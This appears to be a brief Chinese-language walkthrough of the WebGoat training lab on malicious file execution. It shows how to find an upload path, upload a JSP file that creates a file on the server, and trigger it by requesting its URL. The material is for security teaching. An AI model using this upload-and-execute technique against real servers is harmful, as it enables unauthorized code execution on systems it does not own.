Malicious File Execution
先上传一张图片,用开发者工具确定上传图片的路径。
1
| http://localhost:8080/webgoat/upload/sponge.jpg
|
然后上传一个恶意jsp(可执行文件,其他环境下可能是 php,asp )
1
| <HTML> <% java.io.File file = new java.io.File("filepath\\guest.txt"); file.createNewFile(); %> </HTML>
|
然后访问该地址执行jsp.
1
| http://localhost/WebGoat/uploads/yourfile.jsp
|
